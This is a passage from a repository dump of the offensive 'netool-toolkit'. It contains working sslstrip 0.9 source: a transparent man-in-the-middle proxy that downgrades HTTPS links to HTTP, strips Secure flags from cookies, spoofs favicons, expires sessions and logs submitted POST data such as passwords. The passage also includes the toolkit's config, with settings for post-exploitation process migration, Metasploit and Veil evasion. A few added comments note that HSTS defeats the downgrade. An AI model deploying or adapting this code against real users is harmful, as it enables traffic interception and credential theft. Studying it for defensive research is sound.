12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 27 | 28 | The rule with cookies is that specific overrides general. So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 
40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 | expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." 
+ hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/CookieCleaner.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/CookieCleaner.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 
6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/DnsCache.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/DnsCache.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 
12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 49 | 50 | ServerConnection.handleHeader(self, key, value) 51 | 52 | def stripFileFromPath(self, path): 53 | (strippedPath, lastSlash, file) = path.rpartition('/') 54 | return strippedPath 55 | 56 | def buildAbsoluteLink(self, link): 57 | absoluteLink = "" 58 | 59 | if ((not link.startswith('http')) and (not link.startswith('/'))): 60 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 61 | 62 | 
logging.debug("Found path-relative link in secure transmission: " + link) 63 | logging.debug("New Absolute path-relative link: " + absoluteLink) 64 | elif not link.startswith('http'): 65 | absoluteLink = "http://"+self.headers['host']+link 66 | 67 | logging.debug("Found relative link in secure transmission: " + link) 68 | logging.debug("New Absolute link: " + absoluteLink) 69 | 70 | if not absoluteLink == "": 71 | absoluteLink = absoluteLink.replace('&', '&') 72 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 73 | 74 | def replaceCssLinks(self, data): 75 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 76 | 77 | for match in iterator: 78 | self.buildAbsoluteLink(match.group(1)) 79 | 80 | return data 81 | 82 | def replaceFavicon(self, data): 83 | match = re.search(SSLServerConnection.iconExpression, data) 84 | 85 | if (match != None): 86 | data = re.sub(SSLServerConnection.iconExpression, 87 | "", data) 88 | else: 89 | data = re.sub(SSLServerConnection.headExpression, 90 | "", data) 91 | 92 | return data 93 | 94 | def replaceSecureLinks(self, data): 95 | data = ServerConnection.replaceSecureLinks(self, data) 96 | data = self.replaceCssLinks(data) 97 | 98 | if (self.urlMonitor.isFaviconSpoofing()): 99 | data = self.replaceFavicon(data) 100 | 101 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 102 | 103 | for match in iterator: 104 | self.buildAbsoluteLink(match.group(10)) 105 | 106 | return data 107 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/SSLServerConnection.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/SSLServerConnection.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ServerConnection.py: 
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

# NOTE(review): the page shows this file flattened onto a few long lines with
# gutter numbers; the indentation below is reconstructed from the syntax.

import logging, re, string, random, zlib, gzip, StringIO

from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor

class ServerConnection(HTTPClient):

    ''' The server connection is where we do the bulk of the stripping. Everything that
    comes back is examined. The headers we dont like are removed, and the links are stripped
    from HTTPS to HTTP.

    Per-connection state set in __init__: isImageRequest, isCompressed,
    contentLength and shutdownComplete; urlMonitor is the shared URLMonitor
    instance.

    Logging: the request line, every request and response header, the POST
    body and the full non-image response body are written to the log
    (sendRequest, sendHeaders, sendPostData, handleHeader, handleResponse).

    Defensive context: the rewriting depends on the client following the
    resulting http:// references. A browser that upgrades the host to HTTPS on
    its own (HSTS / preload list) does not make those plaintext requests.
    '''

    # An https:// URL with the URL characters that follow it; matches are
    # registered with the URL monitor in replaceSecureLinks.
    urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
    # The bare "https://" scheme prefix.
    urlType = re.compile(r"https://", re.IGNORECASE)
    # https://host:port/ - group 1 is the host.
    urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
        '''Store the request to forward and reset the per-response flags.

        command, uri, postData and headers describe the request; client is the
        object the response is relayed to (setResponseCode, setHeader, write
        and finish are called on it below).
        '''
        self.command = command
        self.uri = uri
        self.postData = postData
        self.headers = headers
        self.client = client
        self.urlMonitor = URLMonitor.getInstance()
        self.isImageRequest = False
        self.isCompressed = False
        self.contentLength = None
        self.shutdownComplete = False

    def getLogLevel(self):
        '''Return the level used for the logging.log() calls in this class: DEBUG.'''
        return logging.DEBUG

    def getPostPrefix(self):
        '''Return the label that sendPostData puts in front of the logged request body.'''
        return "POST"

    def sendRequest(self):
        '''Log and send the request line (command and uri).'''
        logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri))
        self.sendCommand(self.command, self.uri)

    def sendHeaders(self):
        '''Log and send every stored request header, then end the header section.'''
        for header, value in self.headers.items():
            logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
            self.sendHeader(header, value)

        self.endHeaders()

    def sendPostData(self):
        '''Log the request body at WARNING level, then write it to the transport.

        The logged line contains the getPostPrefix() label, the Host header and
        str(self.postData), i.e. whatever the client submitted in the form.
        '''
        logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))
        self.transport.write(self.postData)

    def connectionMade(self):
        '''Twisted callback: once connected, send the request line, the headers
        and, for POST, the body.'''
        logging.log(self.getLogLevel(), "HTTP connection made.")
        self.sendRequest()
        self.sendHeaders()

        if (self.command == 'POST'):
            self.sendPostData()

    def handleStatus(self, version, code, message):
        '''Log the status line and copy code and message to the client response.'''
        logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
        self.client.setResponseCode(int(code), message)

    def handleHeader(self, key, value):
        '''Process one response header and decide whether it is relayed.

        Location values go through replaceSecureLinks first. A content-type
        containing 'image' marks the response as an image. The last chain then
        picks exactly one outcome:
          * content-encoding: not relayed; 'gzip' sets isCompressed.
          * content-length: stored in contentLength, not relayed here.
          * set-cookie: added as a raw header so repeated cookies are kept.
          * anything else (including location and content-type): setHeader.
        '''
        logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value))

        if (key.lower() == 'location'):
            value = self.replaceSecureLinks(value)

        if (key.lower() == 'content-type'):
            if (value.find('image') != -1):
                self.isImageRequest = True
                logging.debug("Response is image content, not scanning...")

        if (key.lower() == 'content-encoding'):
            if (value.find('gzip') != -1):
                logging.debug("Response is compressed...")
                self.isCompressed = True
        elif (key.lower() == 'content-length'):
            self.contentLength = value
        elif (key.lower() == 'set-cookie'):
            self.client.responseHeaders.addRawHeader(key, value)
        else:
            self.client.setHeader(key, value)

    def handleEndHeaders(self):
        '''After the headers: relay the stored Content-Length for images, and shut
        down at once when there is no body.'''
        if (self.isImageRequest and self.contentLength != None):
            self.client.setHeader("Content-Length", self.contentLength)

        # NOTE(review): self.length is not assigned in this file; presumably it is
        # maintained by HTTPClient from the Content-Length header - confirm.
        if self.length == 0:
            self.shutdown()

    def handleResponsePart(self, data):
        '''Stream image data straight to the client; let HTTPClient handle everything else.'''
        if (self.isImageRequest):
            self.client.write(data)
        else:
            HTTPClient.handleResponsePart(self, data)

    def handleResponseEnd(self):
        '''Finish an image response directly; otherwise defer to HTTPClient.'''
        if (self.isImageRequest):
            self.shutdown()
        else:
            HTTPClient.handleResponseEnd(self)

    def handleResponse(self, data):
        '''Rewrite a complete non-image body and relay it.

        Gzip bodies are decompressed first, the body is logged, https://
        references are rewritten by replaceSecureLinks, and Content-Length is
        set to the new length only if the server sent one. The connection is
        then shut down.
        '''
        if (self.isCompressed):
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        logging.log(self.getLogLevel(), "Read from server:\n" + data)

        data = self.replaceSecureLinks(data)

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()

    def replaceSecureLinks(self, data):
        '''Register every https:// URL found in data, then return data with the
        scheme rewritten to http://.

        Each match is registered with the URL monitor for this client IP in
        its http:// form. In the returned text, https://host:port/ becomes
        http://host/ and every remaining https:// prefix becomes http://.
        '''
        iterator = re.finditer(ServerConnection.urlExpression, data)

        for match in iterator:
            url = match.group()

            logging.debug("Found secure reference: " + url)

            url = url.replace('https://', 'http://', 1)
            # NOTE(review): as shown, both arguments are identical, so this call
            # changes nothing; the first one may have been an HTML entity that
            # was decoded when the page was extracted - confirm against upstream.
            url = url.replace('&', '&')
            self.urlMonitor.addSecureLink(self.client.getClientIP(), url)

        data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
        return re.sub(ServerConnection.urlType, 'http://', data)

    def shutdown(self):
        '''Finish the client response and drop the server connection, once only
        (guarded by shutdownComplete).'''
        if not self.shutdownComplete:
            self.shutdownComplete = True
            self.client.finish()
            self.transport.loseConnection()



--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/ServerConnection.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/ServerConnection.pyc
--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/ServerConnectionFactory.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

# NOTE(review): the page shows this file flattened onto one long line with
# gutter numbers; the indentation below is reconstructed from the syntax.

import logging
from twisted.internet.protocol import ClientFactory

class ServerConnectionFactory(ClientFactory):

    '''Twisted ClientFactory that carries one proxied request and builds the
    protocol object that forwards it.

    The five constructor arguments are stored unchanged and handed to the
    protocol in buildProtocol.
    '''

    def __init__(self, command, uri, postData, headers, client):
        '''Remember the request (command, uri, postData, headers) and the client
        it belongs to.'''
        self.command = command
        self.uri = uri
        self.postData = postData
        self.headers = headers
        self.client = client

    def buildProtocol(self, addr):
        '''Instantiate self.protocol with the stored request; addr is not used.

        NOTE(review): self.protocol is not assigned in this file; presumably
        the caller sets it to ServerConnection or SSLServerConnection -
        confirm in ClientRequest.py.
        '''
        return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)

    def clientConnectionFailed(self, connector, reason):
        '''React to a failed upstream connection.

        If the failed destination was not port 443, the request is retried
        through client.proxyViaSSL on port 443 for the host named in the Host
        header; if it already was port 443, the client request is finished.
        '''
        logging.debug("Server connection failed.")

        destination = connector.getDestination()

        if (destination.port != 443):
            logging.debug("Retrying via SSL")
            self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
        else:
            self.client.finish()

--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/ServerConnectionFactory.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/ServerConnectionFactory.pyc
--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/StrippingProxy.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

# NOTE(review): the page shows this file flattened onto one long line with
# gutter numbers; the indentation below is reconstructed from the syntax.

from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest

class StrippingProxy(HTTPChannel):
    '''sslstrip is, at heart, a transparent proxy server that does some unusual things.
    This is the basic proxy server class, where we get callbacks for GET and POST methods.
    We then proxy these out using HTTP or HTTPS depending on what information we have about
    the (connection, client_address) tuple in our cache.

    The class adds no methods of its own: it only points the channel at
    ClientRequest, where the per-request handling lives (ClientRequest.py,
    not part of this listing).

    Defensive context: the client side of this proxy is always plain HTTP, so
    it is only reachable by clients that are willing to speak HTTP to the
    host in question.
    '''

    # Request class the HTTPChannel instantiates for each incoming request.
    requestFactory = ClientRequest

--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/StrippingProxy.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/StrippingProxy.pyc
--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/URLMonitor.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

# NOTE(review): the page shows this file flattened onto a few long lines with
# gutter numbers; the indentation below is reconstructed from the syntax.

import re

class URLMonitor:

    '''
    The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
    server is expecting over SSL. It also keeps track of secure favicon urls.

    One shared instance is handed out by getInstance(). strippedURLs holds the
    (client, url) pairs and strippedURLPorts maps the same pairs to a port.
    '''

    # Start the arms race, and end up here...
    # Hard-coded URL pattern that isSecureLink treats as secure for every
    # client, whether or not the URL was registered.
    javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
    # Shared instance, created on first getInstance() call.
    _instance = None

    def __init__(self):
        '''Start with no registered URLs.

        Note that this sets faviconReplacement, while the favicon accessors
        below read faviconSpoofing; that attribute exists only after
        setFaviconSpoofing() has been called.
        '''
        self.strippedURLs = set()
        self.strippedURLPorts = {}
        self.faviconReplacement = False

    def isSecureLink(self, client, url):
        '''Return True if url matches a javascriptTrickery pattern or the
        (client, url) pair was registered by addSecureLink.'''
        for expression in URLMonitor.javascriptTrickery:
            if (re.match(expression, url)):
                return True

        return (client,url) in self.strippedURLs

    def getSecurePort(self, client, url):
        '''Return the port stored for a registered (client, url) pair, else 443.'''
        if (client,url) in self.strippedURLs:
            return self.strippedURLPorts[(client,url)]
        else:
            return 443

    def addSecureLink(self, client, url):
        '''Register url for client after removing an explicit port from its host.

        The URL is split into scheme prefix (up to and including "//"), host
        and path; the pair (client, scheme + host + path) is added to
        strippedURLs and a port is stored for it in strippedURLPorts.
        '''
        methodIndex = url.find("//") + 2
        method = url[0:methodIndex]

        # assumes url contains a '/' after the host; find() returns -1 otherwise
        # and the slices below then split off the last character instead.
        pathIndex = url.find("/", methodIndex)
        host = url[methodIndex:pathIndex]
        path = url[pathIndex:]

        port = 443
        portIndex = host.find(":")

        if (portIndex != -1):
            host = host[0:portIndex]
            # host was truncated at portIndex on the previous line, so this slice
            # is empty and the fallback below applies: the stored port is 443.
            port = host[portIndex+1:]
            if len(port) == 0:
                port = 443

        url = method + host + path

        self.strippedURLs.add((client, url))
        self.strippedURLPorts[(client, url)] = int(port)

    def setFaviconSpoofing(self, faviconSpoofing):
        '''Store the favicon-spoofing switch.'''
        self.faviconSpoofing = faviconSpoofing

    def isFaviconSpoofing(self):
        '''Return the value stored by setFaviconSpoofing().'''
        return self.faviconSpoofing

    def isSecureFavicon(self, client, url):
        '''Return True when favicon spoofing is on and url contains
        "favicon-x-favicon-x.ico"; client is not used.'''
        return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))

    def getInstance():
        '''Return the shared URLMonitor, creating it on the first call.'''
        if URLMonitor._instance == None:
            URLMonitor._instance = URLMonitor()

        return URLMonitor._instance

    # Makes getInstance callable on the class without an instance.
    getInstance = staticmethod(getInstance)

--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/URLMonitor.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/URLMonitor.pyc
--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/__init__.py
--------------------------------------------------------------------------------
/sslstrip-0.9/sslstrip/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/__init__.pyc
--------------------------------------------------------------------------------
/templates/WinSCP.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/WinSCP.exe
--------------------------------------------------------------------------------
/templates/flashplayer.exe:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/flashplayer.exe -------------------------------------------------------------------------------- /templates/procexp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/procexp.exe -------------------------------------------------------------------------------- /templates/procexp.sfx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/procexp.sfx.exe -------------------------------------------------------------------------------- /templates/putty.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/putty.exe -------------------------------------------------------------------------------- /templates/template.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/template.pdf -------------------------------------------------------------------------------- /toolkit_config: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # # 3 | # The following config file will allow you to customize settings within # 4 | # netool toolkit, The lines that do not have comment code ("#") are the # 5 | # fields you want to toy with. 
There are additional options, read the # 6 | # comments for additional config settings. # 7 | # # 8 | # REMEMBER THAT CHANGING THESE SETTINGS WILL AFFECT # 9 | # netool.sh AND priv8.sh SCRIPTS WAY OF WORKING. # 10 | # -[ Suspicious Shell Activity Labs 2015 ]- # 11 | # # 12 | ########################################################################## 13 | 14 | 15 | # set temporary download folder 16 | # the toolkit will download files to a temp folder 17 | # and then copy the files to the needed path 18 | TEMP_FOLDER=/tmp/evil 19 | 20 | 21 | # display public ip address in r00tsect0r module 22 | # accepted values are YES or NO 23 | DISPLAY_PUBLIC_IP=YES 24 | 25 | 26 | # display changelog at startup in every new update done 27 | # accepted values are YES or NO 28 | SET_CHANGELOG=YES 29 | 30 | 31 | # Clean toolkit logs (.log) on exit? 32 | # accepted values are YES or NO 33 | CLEAN_LOGS=YES 34 | 35 | 36 | # Clean handlers stored (resource files) on exit? 37 | # this setting will delete all listenners.rc 38 | # accepted values are YES or NO 39 | CLEAN_HANDLERS=NO 40 | 41 | 42 | # Clean t00lkit database on exit?
43 | # this setting will clean database.db file 44 | # accepted values are YES or NO 45 | CLEAN_DATABASE=NO 46 | 47 | 48 | # in post exploitation module the 'migrate function' will 49 | # migrate the open session to 'wininit.exe' process by default 50 | # in this field you can change that to migrate to another 51 | # process (example -> notepad.exe or explorer.exe) 52 | MIGRATE_TO=wininit.exe 53 | 54 | 55 | # set php5 installation path 56 | PHP5_INSTALL_PATH=/etc/php5 57 | 58 | 59 | # zenmap-nmap install path 60 | ZENMAP_INSTALL_PATH=/usr/share/nmap 61 | 62 | 63 | # ettercap install path 64 | ETTERCAP_INSTALL_PATH=/usr/share/ettercap 65 | 66 | 67 | # macchanger install path 68 | MACCHANGER_INSTALL_PATH=/usr/share/macchanger 69 | 70 | 71 | # metasploit install path 72 | METASPLOIT_INSTALL_PATH=/usr/share/metasploit-framework 73 | 74 | 75 | # apache web root path 76 | APACHE_INSTALL_PATH=/var/www/html 77 | 78 | 79 | # driftnet install path 80 | DRIFTNET_INSTALL_PATH=/usr/share/doc/driftnet 81 | 82 | 83 | # etter.conf install path 84 | ETTERCONF_INSTALL_PATH=/etc/ettercap/etter.conf 85 | 86 | 87 | # etter.dns install path 88 | ETTERDNS_INSTALL_PATH=/etc/ettercap/etter.dns 89 | 90 | 91 | # etter.services path 92 | ETTERSERV_INSTALL_PATH=/usr/share/ettercap/etter.services 93 | 94 | 95 | # veil evasion install path 96 | VEIL_EVASION_CONF=/etc/veil/settings.py 97 | 98 | 99 | # priv8.sh install path 100 | ROOTSECTOR_INSTALL_PATH=modules/priv8.sh 101 | --------------------------------------------------------------------------------